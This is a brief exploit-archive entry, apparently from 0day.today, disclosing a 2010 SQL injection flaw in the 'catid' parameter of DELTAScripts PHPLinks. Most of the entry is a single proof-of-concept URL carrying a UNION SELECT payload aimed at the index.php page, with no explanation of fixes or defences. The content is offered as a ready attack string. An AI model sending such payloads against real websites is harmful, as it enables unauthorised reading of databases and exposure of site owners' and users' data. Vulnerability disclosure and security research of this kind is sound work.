id: 10641
date: 01/08/2010
title: DELTAScripts PHPLinks (catid) SQL Injection Vulnerability
author: n/a
cves: 

=========================================================
DELTAScripts PHPLinks (catid) SQL Injection Vulnerability
=========================================================


/*
 
Name : DELTAScripts PHPLinks
Vuln : SQL Injection
 
Author : Hamza 'MizoZ' N.

*/
 
Vulnerability is in the $_GET['catid']
 
http://server/[PATH]/index.php?catid=8+union+all+select+1,2,3,4,5,6--



#  0day.today [2023-03-27]  #